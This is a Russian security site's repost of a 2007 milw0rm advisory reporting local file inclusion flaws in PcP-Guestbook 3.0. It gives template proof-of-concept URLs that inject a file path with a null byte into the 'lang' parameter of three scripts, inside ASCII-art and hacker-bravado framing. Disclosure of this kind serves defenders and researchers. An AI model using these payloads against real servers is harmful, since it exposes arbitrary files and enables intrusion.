Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  CVE-2007-1871: Cross site scripting in chcounter 3.1.3

  E107 - (v0.7.8) Access Escalation Vulnerbility - PoC

  Critical phpwiki c99shell exploit

  CVE-2007-1872: Cross site scripting in toendaCMS 1.5.3

From:Dj7xpl <dj7xpl_(at)_yahoo.com>
Date:11 апреля 2007 г.
Subject:PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities

                                                         .-
""""""""-.                                 
                                                        /   Dj7xpl   \                              
                                                       |              |                                
                                                       |,  .-.  .-.  ,|                                
                                                       | )(_o/  \o_)( |                                     
                                                       |/     /\     \|                                 
                                             (@_       (_     ^^     _)                  
                                        _     ) \_______\__|IIIIII|__/_______________________________
                                       (_)@8@8{}<________|-
\IIIIII/-|________________________________>
                                              )_/        \          /
                                              (@
  
+_______________________________________________Iranian Are The Best In World___________________________________________+
*
*
*       [~] Portal.......:    PcP-Book 3.0
* [~] Site.........:    http://www.pcp-system.at
*       [~] Down.........:    http://www.ectona.org/download/?id=621&s=info
* [~] Author.......:    Dj7xpl  | Dj7xpl@yahoo.com
*
+________________________________________________________________________________
_______________________________________+

+________________________________________________________________________________
_______________________________________+
*
*
*
*       [~] Vuln.........:         http://[Target]/[Path]/index.php?lang=[File-To-Require]%00
*                                  http://[Target]/[Path]/gb.php?lang=[File-To-
Require]%00
*                                  http://[Target]/[Path]/faq.php?lang=[File-To-
Require]%00
*                             
*
+________________________________________________________________________________
_______________________________________+

# milw0rm.com [2007-04-08]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород